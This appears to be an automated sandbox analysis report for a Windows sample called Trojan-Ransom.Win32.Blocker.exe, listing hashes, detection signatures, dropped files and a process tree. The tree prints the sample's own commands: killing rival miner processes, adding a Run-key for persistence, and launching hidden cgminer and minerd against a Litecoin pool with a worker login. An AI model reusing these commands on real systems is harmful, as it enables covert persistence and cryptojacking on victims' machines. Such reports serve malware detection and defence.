c272cea2f8c2ddc5c1fbc41da1194aa8546d3927f1508138b459e9677667b4aa

Analysis

max time kernel
134s
max time network
49s
platform
windows7_x64
resource
win7-20220901-en
resource tags

arch:x64arch:x86image:win7-20220901-enlocale:en-usos:windows7-x64system
submitted
06-11-2022 22:27

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

Trojan-Ransom.Win32.Blocker.exe
Size

744KB
MD5

9a38ae7a6eea4bafd0abd6b9ef85430b
SHA1

39977abea4b0c938f55b8b966ad57344ea511756
SHA256

c272cea2f8c2ddc5c1fbc41da1194aa8546d3927f1508138b459e9677667b4aa
SHA512

a2bae9b26940d2a16c61d68b63e6b7268307650d2ebc7df2bed14d9ac899cf0d713d5cf9fcde4c713e3f5eebb66eca015ed2fb7d0d04c78fbd9510d1231589e8
SSDEEP

12288:w1NWl6sZ9rUNeOz6rvonkJpxewNQiTmlqoJBZchQE67WorXHcIx6h3iOttj8kEcc:4Ji9rUNnz6rvcuvZzTmlqojCxorXrmSd

Score

8^/10

persistence upx

Malware Config

Signatures

Executes dropped EXE 3 IoCs

pid	Process
1976	rite.exe
1188	cgminer.exe
1720	minerd.exe

UPX packed file 4 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

resource	yara_rule
behavioral1/files/0x000a000000012307-67.dat	upx
behavioral1/files/0x000a000000012307-70.dat	upx
behavioral1/files/0x000a000000012307-66.dat	upx
behavioral1/memory/1976-72-0x0000000000400000-0x0000000000459000-memory.dmp	upx

Loads dropped DLL 8 IoCs

pid	Process
396	cmd.exe
1908	cmd.exe
1752	cmd.exe
1752	cmd.exe
1908	cmd.exe
1720	minerd.exe
1720	minerd.exe
1720	minerd.exe

Adds Run key to start application 2 TTPs 2 IoCs

persistence

Registry Run Keys / Startup Folder

T1060

Modify Registry

T1112

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-21-4063495947-34355257-727531523-1000\Software\Microsoft\Windows\CurrentVersion\Run	reg.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-4063495947-34355257-727531523-1000\Software\Microsoft\Windows\CurrentVersion\Run\Load = "C:\\Users\\Admin\\AppData\\Roaming\\Trojan-Ransom.Win32.Blocker.exe"	reg.exe

Kills process with taskkill 4 IoCs

evasion

pid	Process
1816	taskkill.exe
1820	taskkill.exe
1504	taskkill.exe
1072	taskkill.exe

Modifies registry key 1 TTPs 1 IoCs

Modify Registry

T1112

pid	Process
1808	reg.exe

Suspicious use of AdjustPrivilegeToken 4 IoCs

description	pid	Process
Token: SeDebugPrivilege	1816	taskkill.exe
Token: SeDebugPrivilege	1072	taskkill.exe
Token: SeDebugPrivilege	1820	taskkill.exe
Token: SeDebugPrivilege	1504	taskkill.exe

Suspicious use of SetWindowsHookEx 1 IoCs

pid	Process
620	Trojan-Ransom.Win32.Blocker.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 620 wrote to memory of 1188	620	Trojan-Ransom.Win32.Blocker.exe	27
PID 620 wrote to memory of 1188	620	Trojan-Ransom.Win32.Blocker.exe	27
PID 620 wrote to memory of 1188	620	Trojan-Ransom.Win32.Blocker.exe	27
PID 620 wrote to memory of 1188	620	Trojan-Ransom.Win32.Blocker.exe	27
PID 620 wrote to memory of 1252	620	Trojan-Ransom.Win32.Blocker.exe	28
PID 620 wrote to memory of 1252	620	Trojan-Ransom.Win32.Blocker.exe	28
PID 620 wrote to memory of 1252	620	Trojan-Ransom.Win32.Blocker.exe	28
PID 620 wrote to memory of 1252	620	Trojan-Ransom.Win32.Blocker.exe	28
PID 620 wrote to memory of 676	620	Trojan-Ransom.Win32.Blocker.exe	30
PID 620 wrote to memory of 676	620	Trojan-Ransom.Win32.Blocker.exe	30
PID 620 wrote to memory of 676	620	Trojan-Ransom.Win32.Blocker.exe	30
PID 620 wrote to memory of 676	620	Trojan-Ransom.Win32.Blocker.exe	30
PID 620 wrote to memory of 1904	620	Trojan-Ransom.Win32.Blocker.exe	32
PID 620 wrote to memory of 1904	620	Trojan-Ransom.Win32.Blocker.exe	32
PID 620 wrote to memory of 1904	620	Trojan-Ransom.Win32.Blocker.exe	32
PID 620 wrote to memory of 1904	620	Trojan-Ransom.Win32.Blocker.exe	32
PID 1188 wrote to memory of 1504	1188	cmd.exe	34
PID 1188 wrote to memory of 1504	1188	cmd.exe	34
PID 1188 wrote to memory of 1504	1188	cmd.exe	34
PID 1188 wrote to memory of 1504	1188	cmd.exe	34
PID 676 wrote to memory of 1816	676	cmd.exe	37
PID 676 wrote to memory of 1816	676	cmd.exe	37
PID 676 wrote to memory of 1816	676	cmd.exe	37
PID 676 wrote to memory of 1816	676	cmd.exe	37
PID 1252 wrote to memory of 1072	1252	cmd.exe	36
PID 1252 wrote to memory of 1072	1252	cmd.exe	36
PID 1252 wrote to memory of 1072	1252	cmd.exe	36
PID 1252 wrote to memory of 1072	1252	cmd.exe	36
PID 1904 wrote to memory of 1820	1904	cmd.exe	38
PID 1904 wrote to memory of 1820	1904	cmd.exe	38
PID 1904 wrote to memory of 1820	1904	cmd.exe	38
PID 1904 wrote to memory of 1820	1904	cmd.exe	38
PID 620 wrote to memory of 832	620	Trojan-Ransom.Win32.Blocker.exe	40
PID 620 wrote to memory of 832	620	Trojan-Ransom.Win32.Blocker.exe	40
PID 620 wrote to memory of 832	620	Trojan-Ransom.Win32.Blocker.exe	40
PID 620 wrote to memory of 832	620	Trojan-Ransom.Win32.Blocker.exe	40
PID 620 wrote to memory of 396	620	Trojan-Ransom.Win32.Blocker.exe	42
PID 620 wrote to memory of 396	620	Trojan-Ransom.Win32.Blocker.exe	42
PID 620 wrote to memory of 396	620	Trojan-Ransom.Win32.Blocker.exe	42
PID 620 wrote to memory of 396	620	Trojan-Ransom.Win32.Blocker.exe	42
PID 832 wrote to memory of 1808	832	cmd.exe	44
PID 832 wrote to memory of 1808	832	cmd.exe	44
PID 832 wrote to memory of 1808	832	cmd.exe	44
PID 832 wrote to memory of 1808	832	cmd.exe	44
PID 396 wrote to memory of 1976	396	cmd.exe	45
PID 396 wrote to memory of 1976	396	cmd.exe	45
PID 396 wrote to memory of 1976	396	cmd.exe	45
PID 396 wrote to memory of 1976	396	cmd.exe	45
PID 620 wrote to memory of 1908	620	Trojan-Ransom.Win32.Blocker.exe	46
PID 620 wrote to memory of 1908	620	Trojan-Ransom.Win32.Blocker.exe	46
PID 620 wrote to memory of 1908	620	Trojan-Ransom.Win32.Blocker.exe	46
PID 620 wrote to memory of 1908	620	Trojan-Ransom.Win32.Blocker.exe	46
PID 620 wrote to memory of 1752	620	Trojan-Ransom.Win32.Blocker.exe	47
PID 620 wrote to memory of 1752	620	Trojan-Ransom.Win32.Blocker.exe	47
PID 620 wrote to memory of 1752	620	Trojan-Ransom.Win32.Blocker.exe	47
PID 620 wrote to memory of 1752	620	Trojan-Ransom.Win32.Blocker.exe	47
PID 1752 wrote to memory of 1720	1752	cmd.exe	51
PID 1752 wrote to memory of 1720	1752	cmd.exe	51
PID 1752 wrote to memory of 1720	1752	cmd.exe	51
PID 1752 wrote to memory of 1720	1752	cmd.exe	51
PID 1908 wrote to memory of 1188	1908	cmd.exe	50
PID 1908 wrote to memory of 1188	1908	cmd.exe	50
PID 1908 wrote to memory of 1188	1908	cmd.exe	50
PID 1908 wrote to memory of 1188	1908	cmd.exe	50

C:\Users\Admin\AppData\Local\Temp\Trojan-Ransom.Win32.Blocker.exe
"C:\Users\Admin\AppData\Local\Temp\Trojan-Ransom.Win32.Blocker.exe"
1⤵
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:620
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c taskkill /IM minerd.exe
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:1188
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /IM minerd.exe
    3⤵
    - Kills process with taskkill
    - Suspicious use of AdjustPrivilegeToken
    PID:1504
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c taskkill /IM cgminer.exe
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:1252
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /IM cgminer.exe
    3⤵
    - Kills process with taskkill
    - Suspicious use of AdjustPrivilegeToken
    PID:1072
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c taskkill /IM ubasoft.exe
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:676
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /IM ubasoft.exe
    3⤵
    - Kills process with taskkill
    - Suspicious use of AdjustPrivilegeToken
    PID:1816
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c taskkill /IM jhprotominer.exe
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:1904
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /IM jhprotominer.exe
    3⤵
    - Kills process with taskkill
    - Suspicious use of AdjustPrivilegeToken
    PID:1820
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Run\ /f /v Load /t REG_SZ /d C:\Users\Admin\AppData\Roaming\Trojan-Ransom.Win32.Blocker.exe
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:832
- - C:\Windows\SysWOW64\reg.exe
    reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Run\ /f /v Load /t REG_SZ /d C:\Users\Admin\AppData\Roaming\Trojan-Ransom.Win32.Blocker.exe
    3⤵
    - Adds Run key to start application
    - Modifies registry key
    PID:1808
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c cd %appdata% & rite.exe
  2⤵
  - Loads dropped DLL
  - Suspicious use of WriteProcessMemory
  PID:396
- - C:\Users\Admin\AppData\Roaming\rite.exe
    rite.exe
    3⤵
    - Executes dropped EXE
    PID:1976
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c cd %appdata% & cd right & cgminer.exe -o stratum+tcp://us.ltcrabbit.com:3334 -u azams.zeds -p matamu -I 12
  2⤵
  - Loads dropped DLL
  - Suspicious use of WriteProcessMemory
  PID:1908
- - C:\Users\Admin\AppData\Roaming\right\cgminer.exe
    cgminer.exe -o stratum+tcp://us.ltcrabbit.com:3334 -u azams.zeds -p matamu -I 12
    3⤵
    - Executes dropped EXE
    PID:1188
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c cd %appdata% & cd right & minerd.exe -o stratum+tcp://us.ltcrabbit.com:3334 -u azams.zeds -p matamu -t 3
  2⤵
  - Loads dropped DLL
  - Suspicious use of WriteProcessMemory
  PID:1752
- - C:\Users\Admin\AppData\Roaming\right\minerd.exe
    minerd.exe -o stratum+tcp://us.ltcrabbit.com:3334 -u azams.zeds -p matamu -t 3
    3⤵
    - Executes dropped EXE
    - Loads dropped DLL
    PID:1720

Network

MITRE ATT&CK Enterprise v6

Initial Access

Execution

Persistence

Registry Run Keys / Startup Folder

T1060

Privilege Escalation

Defense Evasion

Modify Registry

T1112

Credential Access

Discovery

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Roaming\right\cgminer.exe

Filesize
956KB

MD5
b2e8e9f8d738a97a75ee5318068d2960

SHA1
ba52cfe270abd7547ad63bec4ae5ab676e800290

SHA256
0c5f208de21292cc66aba0f08fc6f0552183ba03aef5c274c5b5043b2ac78818

SHA512
3fde39138af13004ceef1053abdbbd7209b26d8d053b636f7cadca3b3686638d14df32da8922ff45dd8a7c65b1d970475e38f34039b40c81eb056d4ecc26a089

Download Submit
C:\Users\Admin\AppData\Roaming\right\cgminer.exe

Filesize
956KB

MD5
b2e8e9f8d738a97a75ee5318068d2960

SHA1
ba52cfe270abd7547ad63bec4ae5ab676e800290

SHA256
0c5f208de21292cc66aba0f08fc6f0552183ba03aef5c274c5b5043b2ac78818

SHA512
3fde39138af13004ceef1053abdbbd7209b26d8d053b636f7cadca3b3686638d14df32da8922ff45dd8a7c65b1d970475e38f34039b40c81eb056d4ecc26a089

Download Submit
C:\Users\Admin\AppData\Roaming\right\libcurl-4.dll

Filesize
240KB

MD5
6f15c32334d2310abf30187d6294eaf5

SHA1
4cd819bece131457122a992200bc0e58ce6b8a40

SHA256
99356e0620182b9490e2a74ee03f406e155577e7e368ace2922a10d743163ee7

SHA512
34822ab7693203a6cce7846aac784f44c139d31b5d9d75306049c47ac25037e72ef4e1ce62f782bb59e5ce223878663676f42b42421ab2f2dc9150ab36694191

Download Submit
C:\Users\Admin\AppData\Roaming\right\minerd.exe

Filesize
183KB

MD5
ea5c563db06d96b90141698afd27f2fc

SHA1
40a903c091336a8108685bf891d5558863346d5f

SHA256
583b585078f37f5d399a228f1b8021ca0a9e904a55792281048bae9cfe0e95c1

SHA512
a72430144b357be500158f682b2fb7a6038dfbf12a01f9cede5c85e55cf683aa43d681992d0c26a4ccc108c75af8067aaf105cbf22a1815e712aa4bc504e4667

Download Submit
C:\Users\Admin\AppData\Roaming\right\minerd.exe

Filesize
183KB

MD5
ea5c563db06d96b90141698afd27f2fc

SHA1
40a903c091336a8108685bf891d5558863346d5f

SHA256
583b585078f37f5d399a228f1b8021ca0a9e904a55792281048bae9cfe0e95c1

SHA512
a72430144b357be500158f682b2fb7a6038dfbf12a01f9cede5c85e55cf683aa43d681992d0c26a4ccc108c75af8067aaf105cbf22a1815e712aa4bc504e4667

Download Submit
C:\Users\Admin\AppData\Roaming\right\pthreadGC2.dll

Filesize
117KB

MD5
72c1ff7f3c7474850b11fc962ee1620c

SHA1
b94f73a1ce848d18b38274c96e863df0636f48a7

SHA256
3b159da9dad9afd4bd28b5b1a53dc502a2487068055ed8c30136a76cd6924890

SHA512
1ed4b3c34dd0033ec2aa05bdacaa45041d9cd5880fdb5530ca033308ab349c09d4811bb276bbdf51a3040b7a337f9a5d33796924550962a56058203799c5bd53

Download Submit
C:\Users\Admin\AppData\Roaming\right\zlib1.dll

Filesize
98KB

MD5
bcaf983ab27437913e76776f79b850c5

SHA1
8544045069e9f6e7a121825d3cfa95f77547bab3

SHA256
57fd78bb3d90c04ee949c062faf6725d361de34ff2fe301bce27d0238e9190ae

SHA512
49e7ecb3829d3e8c23fad59232a28c8f81eb72f7f265739cd37cad4505da089f4f8b77e100842161cf52462c05e9e8f1f3eab9fbafee1daa665e791e2fe24252

Download Submit
C:\Users\Admin\AppData\Roaming\rite.exe

Filesize
714KB

MD5
2fb622e0d2abdd9d4da636605ebdf187

SHA1
e7d7c09ee20cdeb5aaa06771917337c67be69c3f

SHA256
5f8bdbd6f544bc79156e2d77cdc3b61756c8d0bed3697d5d508a9e496cae854e

SHA512
4fa5c44633539be5aa56f96c4b09fe3dd04949f3f36d8fc95ac57fb73bb2a5328933d502935b50a6a2565c10c370d98b80858642e82ae8cb23eef223508f5685

Download Submit
C:\Users\Admin\AppData\Roaming\rite.exe

Filesize
714KB

MD5
2fb622e0d2abdd9d4da636605ebdf187

SHA1
e7d7c09ee20cdeb5aaa06771917337c67be69c3f

SHA256
5f8bdbd6f544bc79156e2d77cdc3b61756c8d0bed3697d5d508a9e496cae854e

SHA512
4fa5c44633539be5aa56f96c4b09fe3dd04949f3f36d8fc95ac57fb73bb2a5328933d502935b50a6a2565c10c370d98b80858642e82ae8cb23eef223508f5685

Download Submit
\Users\Admin\AppData\Roaming\right\cgminer.exe

Filesize
956KB

MD5
b2e8e9f8d738a97a75ee5318068d2960

SHA1
ba52cfe270abd7547ad63bec4ae5ab676e800290

SHA256
0c5f208de21292cc66aba0f08fc6f0552183ba03aef5c274c5b5043b2ac78818

SHA512
3fde39138af13004ceef1053abdbbd7209b26d8d053b636f7cadca3b3686638d14df32da8922ff45dd8a7c65b1d970475e38f34039b40c81eb056d4ecc26a089

Download Submit
\Users\Admin\AppData\Roaming\right\cgminer.exe

Filesize
956KB

MD5
b2e8e9f8d738a97a75ee5318068d2960

SHA1
ba52cfe270abd7547ad63bec4ae5ab676e800290

SHA256
0c5f208de21292cc66aba0f08fc6f0552183ba03aef5c274c5b5043b2ac78818

SHA512
3fde39138af13004ceef1053abdbbd7209b26d8d053b636f7cadca3b3686638d14df32da8922ff45dd8a7c65b1d970475e38f34039b40c81eb056d4ecc26a089

Download Submit
\Users\Admin\AppData\Roaming\right\libcurl-4.dll

Filesize
240KB

MD5
6f15c32334d2310abf30187d6294eaf5

SHA1
4cd819bece131457122a992200bc0e58ce6b8a40

SHA256
99356e0620182b9490e2a74ee03f406e155577e7e368ace2922a10d743163ee7

SHA512
34822ab7693203a6cce7846aac784f44c139d31b5d9d75306049c47ac25037e72ef4e1ce62f782bb59e5ce223878663676f42b42421ab2f2dc9150ab36694191

Download Submit
\Users\Admin\AppData\Roaming\right\minerd.exe

Filesize
183KB

MD5
ea5c563db06d96b90141698afd27f2fc

SHA1
40a903c091336a8108685bf891d5558863346d5f

SHA256
583b585078f37f5d399a228f1b8021ca0a9e904a55792281048bae9cfe0e95c1

SHA512
a72430144b357be500158f682b2fb7a6038dfbf12a01f9cede5c85e55cf683aa43d681992d0c26a4ccc108c75af8067aaf105cbf22a1815e712aa4bc504e4667

Download Submit
\Users\Admin\AppData\Roaming\right\minerd.exe

Filesize
183KB

MD5
ea5c563db06d96b90141698afd27f2fc

SHA1
40a903c091336a8108685bf891d5558863346d5f

SHA256
583b585078f37f5d399a228f1b8021ca0a9e904a55792281048bae9cfe0e95c1

SHA512
a72430144b357be500158f682b2fb7a6038dfbf12a01f9cede5c85e55cf683aa43d681992d0c26a4ccc108c75af8067aaf105cbf22a1815e712aa4bc504e4667

Download Submit
\Users\Admin\AppData\Roaming\right\pthreadGC2.dll

Filesize
117KB

MD5
72c1ff7f3c7474850b11fc962ee1620c

SHA1
b94f73a1ce848d18b38274c96e863df0636f48a7

SHA256
3b159da9dad9afd4bd28b5b1a53dc502a2487068055ed8c30136a76cd6924890

SHA512
1ed4b3c34dd0033ec2aa05bdacaa45041d9cd5880fdb5530ca033308ab349c09d4811bb276bbdf51a3040b7a337f9a5d33796924550962a56058203799c5bd53

Download Submit
\Users\Admin\AppData\Roaming\right\zlib1.dll

Filesize
98KB

MD5
bcaf983ab27437913e76776f79b850c5

SHA1
8544045069e9f6e7a121825d3cfa95f77547bab3

SHA256
57fd78bb3d90c04ee949c062faf6725d361de34ff2fe301bce27d0238e9190ae

SHA512
49e7ecb3829d3e8c23fad59232a28c8f81eb72f7f265739cd37cad4505da089f4f8b77e100842161cf52462c05e9e8f1f3eab9fbafee1daa665e791e2fe24252

Download Submit
\Users\Admin\AppData\Roaming\rite.exe

Filesize
714KB

MD5
2fb622e0d2abdd9d4da636605ebdf187

SHA1
e7d7c09ee20cdeb5aaa06771917337c67be69c3f

SHA256
5f8bdbd6f544bc79156e2d77cdc3b61756c8d0bed3697d5d508a9e496cae854e

SHA512
4fa5c44633539be5aa56f96c4b09fe3dd04949f3f36d8fc95ac57fb73bb2a5328933d502935b50a6a2565c10c370d98b80858642e82ae8cb23eef223508f5685

Download Submit
memory/396-65-0x0000000000000000-mapping.dmp

Download
memory/676-58-0x0000000000000000-mapping.dmp

Download
memory/832-64-0x0000000000000000-mapping.dmp

Download
memory/1072-62-0x0000000000000000-mapping.dmp

Download
memory/1188-56-0x0000000000000000-mapping.dmp

Download
memory/1188-82-0x0000000000000000-mapping.dmp

Download
memory/1252-57-0x0000000000000000-mapping.dmp

Download
memory/1504-60-0x0000000000000000-mapping.dmp

Download
memory/1720-80-0x0000000000000000-mapping.dmp

Download
memory/1752-74-0x0000000000000000-mapping.dmp

Download
memory/1808-68-0x0000000000000000-mapping.dmp

Download
memory/1816-61-0x0000000000000000-mapping.dmp

Download
memory/1820-63-0x0000000000000000-mapping.dmp

Download
memory/1904-59-0x0000000000000000-mapping.dmp

Download
memory/1908-73-0x0000000000000000-mapping.dmp

Download
memory/1976-69-0x0000000000000000-mapping.dmp

Download
memory/1976-71-0x0000000075711000-0x0000000075713000-memory.dmp

Filesize
8KB

Download
memory/1976-72-0x0000000000400000-0x0000000000459000-memory.dmp

Filesize
356KB

Download

Analysis

Sharing

General

Malware Config

Signatures

Processes

Network

MITRE ATT&CK Enterprise v6

Replay Monitor

Loading Replay Monitor...

Downloads